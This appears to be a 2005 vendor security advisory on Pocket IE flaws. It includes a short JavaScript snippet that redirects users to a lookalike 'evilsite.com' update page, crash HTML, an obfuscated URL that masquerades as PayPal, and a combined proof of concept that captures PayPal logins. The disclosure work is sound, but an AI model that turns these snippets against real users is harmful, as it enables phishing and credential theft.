Note: this will only work in Pocket IE on a Windows Mobile Pocket PC

Pocket IE Local File Disclosure

In Februrary 2007, it was discovered that Internet Explorer on all versions of the Windows operating system was vulnerable to a Local File Accesses Vulnerability (http://www.xdisclose.com/XD100099.txt). While no mention was made of Pocket IE, it too is vulnerable in WM6 and earlier.

The following uses FlexWallet 2006 as an example of what an attacker could do with this.

<img style=visibility:hidden src="file:///Program Files/FlexWallet 2006/Custom Icons/sample 2.ico" onload=conUser()>
<script>
function conUser(){
alert("You are running an outdated version of FlexWallet. Please update your data files. You will now be redirected to upgrade site.");
location.href="http://softwareupdate.flexwallet.com.evilsite.com/flexwallet/index.php";
}
</script>

Since the IE address bar is limited in size, the subdomain information is the only part of the user that is seen.

Pocket IE Smash Overview
There is a minor bug in Pocket IE that will cause it to instantly crash. The problem is located in webview.dll and is related to how this file parses stylized <div> tags that contain <ul/ol> tags. The following HTML is provided as an illustration.

<style>
#layer1 div.sublayer1 { width:50%; margin:0 1 2 3; padding:4; float:right; }
#layer1 div.sublayer2 { width:50%; margin:0 1 2 3; padding:4; float:right; }
</style>
<div id="layer1">
<div class="sublayer1">
<ul>111</ul>
</div>
<div class="sublayer2">
<ul>222</ul>
</div>
</div>

For a demonstration, please visit the following link.

http://www.airscanner.com/tests/ie_flaw/piesmash.htm

We have notified Microsoft of this flaw.
Credit: Seth Fogie Feb 20, 2005

Pocket IE Attack Overview
There are several weaknesses in Pocket IE that can be used to trick end users into submitting local and/or sensitive data, such as usernames and passwords. The potential for exploiting these vulnerabilities are restricted only by an attacker’s imagination. However, Pocket IE is not as powerful as its big brother, and as such, an attacker is limited in what techniques she can use to launch the attack. For example, Pocket IE has no support for the IFrame tag, which is extremely useful in XSS and browser-based attacks. In addition, Pocket IE does not support every JavaScript command commonly used by attackers. The final example presented below is an attempt to combine these individual flaws into one attack and is only meant to serve as a proof of concept.

Flaw 1: Unicode URL Obsfucation
Severity: Low
This particular attack is not new and has previously plagued PC-based browsers. Pocket IE (Windows Mobile SE 2003) is also vulnerable to this problem. In addition, Pocket IE processes the http protocol in a

<protocol>://user:pass@website format. This itself is not a problem, but when combined with a Unicode URL it can cause confusion and mislead end users.

Example:
http://www.airscanner.com = 69.0.200.106 = %36%39%2E%30%2E%32%30%30%2E%31%30%36

Abuse: http://www.paypal.com&login.rand-%00%01AE67D12EF9090AB933@%36%39%2E%30%2E%32%30%30%2E%31%30%36/
Will take you to http://www.airscanner.com/ not http://www.paypal.com

Flaw 2: Local File Access

Pocket IE will launch local files and either load them into the browser for viewing or launch them using their default program. This includes, but is not limited to, the following file types (these links are subject to OEM variations and may or may not work on your PDA). Click on each file type to test:

Flaw 3: <div> Tag XSS
Severity: Low
Strictly speaking, this is not a flaw. However, it helps provide a vector for attack, so it is worth mentioning. As it turns out, if a local file can be loaded into a framed window in Pocket IE, and this local file contains a named <div></div> section, then that section can be overwritten from a cojoined framed webpage. This is accomplished via JavaScript using 'innerHTML'. With this ability, the loaded local webpage can be overwritten by a loaded remote webpage. This type of attack does not work against webpages loaded from a remote host.

Combination Attack
The following example assumes one thing: that the attacker knows a folder name of the temporary IE store. These folders are randomly named each time a PDA is hard reset. Once set, they will remain as created even if deleted. The proof of concept assumes you know this folder name, or have access to this information. It only takes a second to browse to the '\Windows\Profiles\guest\Temporary Internet Files\Content.IE5' directory to learn these folder names.

This attack will demonstrate how having access to a local file can be a problem. Via URL obfuscation, <div> based XSS, and local file access, this attack will demonstrate how a www.paypal.com username/password information can be captured from an unsuspecting end user. The following steps demonstrate this flaw. All captured information will be emailed to your 'paypal' email address...really, you can trust me.

  1. Clear Pocket IE history, cookie cache, and files (Tools-->Memory in Pocket IE) and reboot device.
  2. Look up www.paypal.com into Pocket IE.
  3. Open File Explorer and go to \Windows\Windows\Profiles\guest\Temporary Internet Files\Content.IE5\ directory and locate file 'paypal[1]'. Note the folder name.
  4. Go to http://www.paypal.com and enter folder name when prompted (you must click this link, this takes you to http://www.airscanner.com/tests/ie_flaw/ie1.htm, not paypal.com).
  5. Let page 'load' and hit 'Yes' for certificate requests.
  6. Enter username and password and submit.

You will be sent to a page that briefly shows you the captured information, and then passed to Paypal.com for actual login. Thats it...but that should be enough.

Since the recent release of the Megan's Law websites, this concept came to our attention. This is to show the very dangerous side affects of allowing XFrame scriping. This example is not funny and should be taken seriously. Again, it will only work on Pocket IE.

http://www.pameganslaw.state.pa.us/SearchResults.aspx?Search=Zip%20Code&ZipCode=17508

It is also possible to use XFrame scripting directly against most any site that uses <div> tags, assuming they have an 'id' value. For example, PHPBB often uses 'news' posting that can be overwritten or added to with this flaw. This does not require any local file access. An example of this follows using a friends site to demonstrate.

 http://johnny.ihackstuff.com

We have notified Microsoft of this flaw.
Credit: Seth Fogie Jan 22, 2005

Revision: 1/27/05
Type in hyperlink caused them to fail. Thanks to Gerard Ivan Samija for noticing this and contacting us with the correct URLs.

Revision: 1/28/05
Megan's Law <span> tag X-frame website example added.

Revision: 1/29/05
PHPBB <div> tag X-frame scripting discussion added..

© 2005 Airscanner Corp.